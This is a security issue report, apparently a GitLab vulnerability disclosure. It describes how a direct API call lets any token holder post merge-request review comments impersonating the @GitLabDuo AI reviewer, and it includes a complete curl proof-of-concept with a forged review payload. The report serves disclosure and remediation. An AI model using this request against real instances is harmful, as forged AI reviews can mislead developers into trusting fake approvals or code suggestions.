Direct API access allows Duo Code Review spoofing

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

Summary

Direct API access to POST /api/v4/ai/duo_workflows/code_review/add_comments allows spoofing AI MR Review comments as the @GitLabDuo user.

Steps to reproduce

On GDK:

  1. Create user PAT, the user does not need to be assigned a Duo seat, the user does not need to be a project member.
  2. Pick a public project ID the user has access to, the project does not need to be Duo enabled
  3. Pick a MR IID from the project and note the path of a changed file in the MR
  4. Create a payload to let @GitLabDuo comment on the MR:
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: localhost:8080' -H $'User-Agent: curl/8.14.1' -H $'Accept: */*' -H $'Private-Token: MYPAT' -H $'Content-Type: application/json' \
    --data-binary $'{\"project_id\":\"MYPROJECTID\",\"merge_request_iid\":MYMRIID,\"review_output\":\"<review>\\n<comment file=\\\"CHANGEDFILENAME\\\" old_line=\\\"\\\" new_line=\\\"1\\\">This is fine!!! :fire: \\n<from>http.HandleFunc(\\\"/hello\\\", helloHandler)</from>\\n<to>http.HandleFunc(\\\"/hellow\\\", helloHandler)</to>\\n</comment>\\n</review>]\"\x0d\x0a}\x0d\x0a\x0d\x0a' \
    $'http://MYGDKHOST:MYGDKPORT/api/v4/ai/duo_workflows/code_review/add_comments'

And fill MYPAT, MYPROJECTID, MYMRIID and CHANGEDFILENAME accordingly.

The result should look like so:

image


cc @gitlab-com/gl-security/appsec